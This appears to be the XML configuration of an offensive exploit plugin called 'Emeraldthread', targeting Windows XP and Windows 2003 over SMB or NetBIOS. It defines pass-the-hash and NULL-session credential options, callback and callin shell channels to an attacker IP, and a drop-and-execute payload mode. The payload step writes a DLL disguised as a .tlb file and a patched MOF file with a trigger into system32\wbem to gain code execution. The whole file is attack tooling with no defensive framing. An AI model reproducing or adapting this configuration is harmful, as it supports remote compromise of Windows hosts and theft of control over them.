<?xml version="1.0"?>
<t:config id="37f19b4f9e69dca220147a0361b8aa2084054325"
name="Emeraldthread"
version="3.0.0"
configversion="3.0.0.0"
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
xmlns:t='tc0'>
<t:inputparameters>
<t:parameter name="NetworkTimeout"
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
type="S16"
default="60" />
<t:parameter name="TargetIp"
description="Target IP Address"
type="IPv4"
binding="//identifier"/>
<t:paramchoice name="Protocol"
default="SMB"
description="Protocol to connect to target with">
<t:paramgroup name="SMB"
description="SMB over TCP">
<t:parameter name="TargetPort"
description="Port used by SMB"
type="TcpPort"
default="445"/>
</t:paramgroup>
<t:paramgroup name="NBT"
description="Netbios over TCP">
<t:parameter name="TargetPort"
description="Port used by Netbios"
type="TcpPort"
default="139"/>
</t:paramgroup>
</t:paramchoice>
<t:paramchoice name="Credentials"
description="Type of credentials to use">
<t:paramgroup name="Anonymous"
description="Anonymous (NULL session)"/>
<t:paramgroup name="Guest"
description="Guest account"/>
<t:paramgroup name="No password"
description="User account with no password set">
<t:parameter name="Username"
description=""
type="UString"/>
</t:paramgroup>
<t:paramgroup name="Password"
description="Username and password">
<t:parameter name="Username"
description=""
type="UString"/>
<t:parameter name="Password"
description=""
type="UString"/>
</t:paramgroup>
<t:paramgroup name="NTLM hash"
description="Username and NTLM hash">
<t:parameter name="Username"
description=""
type="UString"/>
<t:parameter name="NTLMHash"
description="NTLM password hash (in hex)"
type="UString"/>
</t:paramgroup>
<t:paramgroup name="Both hashes"
description="Username, NTLM hash, and LANMAN hash">
<t:parameter name="Username"
description=""
type="UString"/>
<t:parameter name="NTLMHash"
description="NTLM password hash (in hex)"
type="UString"/>
<t:parameter name="LANMANHash"
description="LANMAN password hash (in hex)"
type="UString"/>
</t:paramgroup>
</t:paramchoice>
<t:paramchoice name="PayloadType"
description="Callback from target or callin to target"
default="Callback">
<t:paramgroup name="Callback"
description="Target calls back to plugin">
<t:parameter name="CallbackIp"
description="Callback IP address"
type="IPv4"/>
<t:parameter name="CallbackPort"
description="Callback port"
type="TcpPort"
default="0"/>
<t:parameter name="CallbackLocalPort"
description="Local callback port"
type="TcpPort"
required="false"/>
</t:paramgroup>
<t:paramgroup name="Callin"
description="Target waits for call from plugin">
<t:parameter name="ListenPort"
description="Listen port"
type="TcpPort"/>
<t:parameter name="ListenLocalPort"
description="Listen port"
type="TcpPort"
required="false"/>
<t:parameter name="ListenWait"
description="Timeout to wait before trying to connect in."
type="S16"
default="10"/>
</t:paramgroup>
<t:paramgroup name="DropAndExecute"
description="Payload deployed with no feedback">
<t:parameter name="PayloadContract"
description="Passthrough contract"
type="String"
required="false"/>
</t:paramgroup>
</t:paramchoice>
<t:paramchoice name="PayloadSource"
description="Payload source input type"
default="File">
<t:paramgroup name="File"
description="Payloads provided by file">
<t:parameter name="UnconfiguredDLL"
description="The unconfigured DLL file that will be written to target"
type="LocalFile"
default="esud.dll"/>
<t:parameter name="ConfiguredMOF"
description="The patched mof file that will be written to target"
type="LocalFile"
default="nnetcfg.mof"/>
</t:paramgroup>
<t:paramgroup name="Inline"
description="Payloads provided inline">
<t:parameter name="DLLBuffer"
description="The unconfigured DLL file that will be written to target"
type="UString"
required="false"/>
<t:parameter name="MOFBuffer"
description="The patched mof file that will be written to target"
type="UString"
required="false"/>
</t:paramgroup>
</t:paramchoice>
<t:parameter name="RemoteDLLPath"
description="The path where we want the DLL to exist on target"
type="String"
default="\windows\system32\wbem\wbemess2.tlb"/>
<t:parameter name="RemoteMOFPath"
description="The path where we want the patched mof file to exist on target"
type="String"
default="\windows\system32\wbem\.\mof\nnetcfg.mof"/>
<t:parameter name="RemoteMOFTriggerPath"
description="The path where we want the mof trigger file to exist on target"
type="String"
default="\windows\system32\wbem\.\mof\evntprv.mof"/>
<t:parameter name="PrinterName"
description="The name of the printer on target"
type="UString"
format="Scalar"/>
</t:inputparameters>
<t:outputparameters>
<t:paramchoice name="PayloadType"
description="Payload type determines contract">
<t:paramgroup name="StagedUpload"
description="Callin or Callback">
<t:parameter name="ConnectedTcp"
description="Connected TCP Socket to target"
type="Socket"/>
<t:parameter name="Contract"
description="Plugin contract"
type="String"
value="StagedUpload"/>
<t:parameter name="XorMask"
description=""
type="U8"/>
</t:paramgroup>
<t:paramgroup name="DropAndExecute"
description="">
<t:parameter name="Contract"
description="Plugin contract"
type="String"/>
</t:paramgroup>
</t:paramchoice>
</t:outputparameters>
<t:redirection>
<t:local protocol="Tcp"
listenaddr="TargetIp"
listenport="TargetPort"
destaddr="//identifier"
destport="TargetPort"
closeoncompletion="false"/>
<t:local protocol="Tcp"
listenaddr="TargetIp"
listenport="ListenLocalPort"
destaddr="//identifier"
destport="ListenPort"/>
<t:remote protocol="Tcp"
listenaddr="CallbackIp"
listenport="CallbackPort"
destport="CallbackLocalPort"/>
</t:redirection>
<t:logic>
<t:and>
<t:or>
<t:service name="smb">
<t:bindtovalue name="Protocol" value="SMB"/>
<t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
</t:service>
<t:service name="nbt">
<t:bindtovalue name="Protocol" value="NBT"/>
<t:bindtopath name="TargetPort" path="//service[name='nbt']/port"/>
</t:service>
</t:or>
<t:or>
<t:os family="windows" name="Windows XP" servicepack="1">
<t:bindtovalue name="Target" value="XPSP1"/>
</t:os>
<t:os family="windows" name="Windows XP" servicepack="2">
<t:bindtovalue name="Target" value="XPSP2"/>
</t:os>
<t:os family="windows" name="Windows XP" servicepack="3">
<t:bindtovalue name="Target" value="XPSP3"/>
</t:os>
<t:os family="windows" name="Windows 2003" servicepack="0">
<t:bindtovalue name="Target" value="W2K3SP0"/>
</t:os>
<t:os family="windows" name="Windows 2003" servicepack="1">
<t:bindtovalue name="Target" value="W2K3SP1"/>
</t:os>
<t:os family="windows" name="Windows 2003" servicepack="2">
<t:bindtovalue name="Target" value="W2K3SP2"/>
</t:os>
</t:or>
</t:and>
</t:logic>
</t:config>